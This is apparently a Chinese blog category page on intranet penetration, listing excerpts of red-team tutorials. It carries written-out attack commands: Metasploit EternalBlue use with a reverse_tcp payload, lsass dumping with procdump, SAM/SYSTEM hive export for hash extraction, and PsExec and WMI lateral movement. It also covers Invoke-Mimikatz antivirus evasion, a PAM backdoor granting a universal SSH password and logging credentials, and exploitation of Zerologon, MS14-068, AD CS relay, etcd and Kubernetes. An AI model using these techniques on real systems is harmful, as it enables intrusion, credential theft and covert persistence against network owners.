内网渗透
文章平均质量分 63
LQxdp
红蓝对抗、渗透测试、应急响应。
展开
-
Kubernetes(K8S)各种攻击方法
Kubernetes可以约束一个 Pod 只能在特定的节点上运行。节点亲和性是Pod的一种属性,它使 Pod 被吸引到一类特定的节点 (这可能出于一种偏好,也可能是硬性要求)。污点(Taint)则相反——它使节点能够排斥一类特定的 Pod。容忍度(Toleration)是应用于 Pod 上的,允许(但并不要求)Pod 调度到带有与之匹配的污点的节点上。我们可以控制Pod创建时候的污点来向集群内的节点进行喷洒创建。原创 2024-01-25 09:33:35 · 1420 阅读 · 0 评论 -
ETCD 未授权访问实战案例
3、通常情况下 etcd 所在 ip 即为 6443 管理端口所在 ip,探测后发现 6443 端口开放,接下来可通过 kubectl 操作 k8s。最终发现/registry/secrets/kube-system/tiller-token-vnnjg 为高权限 token。2、尝试在etcd里查询管理员的token,然后使用该token配合kubectl指令接管集群。pod 数量 131 个,实际容器数量大于等于 131 台。列出kube-system 下所有 pods。1、发现 etcd 未授权。原创 2024-01-15 17:37:01 · 2007 阅读 · 0 评论 -
齐治堡垒机私钥登录及后渗透
(目前在 php 版本齐治成功,其他版本未测试)1、老、新版本私钥。2、直接指定私钥登录,可以使用 xshell、命令行(ssh 端口可能是 22 或者 8022)命令行命令:ssh root@1.1.1.1 -i rsa -p 22我这里直接使用 xshell 登录了。登录成功。原创 2024-01-23 14:36:11 · 1011 阅读 · 0 评论 -
gost 多级代理
1、代理链原理,首先需要把最外层跳板机的流量带出来(Frp或gost都可以实现),内层流量(二层、三层、四层等等)代理主要是在每层对应的主机开启gost socks5端口,主要分为非转发代理(./gost -L=socks5://:8899)和转发代理(./gost -L=socks5://:8899 -F=socks5://192.168.202.130:9999),二层推荐非转发代理开启,三层推荐转发代理开启。2、若第二层主机可以访问第三层主机,第三层代理主机不能访问第二层主机,则代理无效。原创 2024-01-15 15:12:14 · 3092 阅读 · 2 评论 -
vcenter综合利用总结
ESXi:安装在实体服务器上,其实是个linux内核的操作系统,官方的说法是有自己专利的一个内核,不属于以往任何现有的产品。只有安装了ESXi以后你才能在上面创建虚拟机。你可以理解成在你的台式机上装的vmware workstation,只不过ESXi不用运行在操作系统上(因为本身就是操作系统)而为虚拟机直接调用硬件资源。vCenter:就是个管理软件,用来管理虚拟机和实体机,比如通过vCenter监控虚拟运行情况、创建虚拟机、调整虚拟机资源、迁移虚拟机等等。原创 2024-01-12 09:47:54 · 1892 阅读 · 0 评论 -
通过xencrypt免杀invoke-mimikatz.ps1
0x01 简介xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。0x02 使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...原创 2020-03-03 20:44:53 · 1605 阅读 · 0 评论 -
WMI横向移动
0x01 WMI横向移动简介简介WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。利用条件1、WMI服务开启,端口135,默认开启。2、防火墙允许135、445等端口通信。0x02 windows自带wmic工具横向移动(推荐)实际测试(wmic)08 -&g...原创 2020-02-02 23:39:59 · 3282 阅读 · 1 评论 -
winRM横向移动
0x01 winRM简介WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。winRM横向移动同时适用于工作组和域环境。0x02 利用条件1、在w...原创 2020-02-15 20:07:18 · 2146 阅读 · 1 评论 -
PsExec的使用
1.本地提权到system命令执行PsExec.exe /accepteula /s \127.0.0.1 cmd /c “whoami”交互式cmdC:\Documents and Settings\Administrator\桌面>PsExec.exe /accepteula /s \127.0.0.1 cmd2.连接其他机器命令执行如果两台机器密码相同,则不需要正确...原创 2020-02-12 21:41:45 · 2984 阅读 · 1 评论 -
PTH横向移动
0x01 简介PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。0x02 通过PTH横向移动一、通过cobaltstrike进行PTH1、在已上线机器中直接dir访问目标系统C盘,提示没权限。beacon> shell dir \192.168.3.123\c$2、此处使用先前已获取的hash对目标administrator用户...原创 2020-02-24 12:17:33 · 4847 阅读 · 1 评论 -
MS17010漏洞利用总结
0x01 常规打法扫描是否存在ms17-010漏洞:nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常规漏洞利用:msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打:msf > set payload windows/x64/meterpreter/reverse_tcp m原创 2021-08-17 21:06:58 · 5311 阅读 · 0 评论 -
域用户爆破(DomainPasswordSpray)
0x01 介绍UserList - Optional UserList parameter. This will be generated automatically if not specified.Password - A single password that will be used to perform the password spray.P...原创 2020-03-03 21:20:16 · 2336 阅读 · 1 评论 -
密码抓取--Prodump+Mimikatz抓取windows系统密码
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。query user2、查看目标系统版本。wmic OS get Caption,OSArchitecture3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。procdump64.exe -accepteula -ma lsass.exe lsass.dmp...原创 2020-02-13 18:35:51 · 1407 阅读 · 1 评论 -
密码抓取--reg免杀抓hash
1、下载下面3个文件reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hivreg save hklm\security security.hiv2、获取密码hash方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致)mimikatz.exe “lsadump::sam /system:sys.hiv /sam:...原创 2020-02-13 19:09:15 · 1252 阅读 · 0 评论 -
密码抓取--获取已控机器本地保存的RDP密码
0x01 简介在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。0x02 获取已控机器本地保存的RDP密码一、mimikatz1、查看本地机器本地连接过的目标机器。reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...原创 2020-02-24 12:59:18 · 17516 阅读 · 0 评论 -
AD CS证书服务中继攻击
0x1 简介AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。注:借图0x2 环境信息域控(windows server 2016):192.168.3.129辅控(windows server 2016):192.168.3.131(AD CS)域内主机(windows 10):192.168.3.171攻击机(kali):192.168.3.158搭建ADCS证书服务:https://mp.原创 2022-03-05 21:23:55 · 3900 阅读 · 0 评论 -
CVE-2020-1472 域内提权
0x1 工具这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce原创 2020-09-16 21:26:35 · 6206 阅读 · 0 评论 -
MS14-068漏洞复现
0x01 简介MS14-068漏洞可将普通域用户权限提升为域管理员用户,这个漏洞实战是碰到的可能性非常小了,但是如此经典的漏洞,不去玩一下,真的很不爽,于是搭建环境,复现一波。0x02 漏洞复现方法1:MS14-068工具利用(https://github.com/ianxtianxt/MS14-068)最开始想用一台win 2003作为域内机器攻击域控,可工具在03上各种问题,于是换了...原创 2020-02-01 22:17:33 · 5193 阅读 · 1 评论 -
SSH PAM后门(万能密码、记录密码)
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。1、在centos中需要关闭selinux。永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。2、查看PAM版本。rpm -qa|grep pam源码下载地址:http://www.linux-pam.org/library/3、解压。wget http://www.linux-pam.org/library/Linux-PAM-1.1.8原创 2021-08-19 16:07:11 · 3616 阅读 · 0 评论 -
mailsniper.ps1使用
下载地址:mailsniper0x01 mailsniper.ps1获取outlook所有联系人(为爆破收集邮箱)在域环境内(域内机器即可)执行命令:powershell -exec bypassImport-Module .\MailSniper.ps1Get-GlobalAddressList -ExchHostname owa2013.rootkit.org -UserName ...原创 2020-02-29 13:24:35 · 3204 阅读 · 0 评论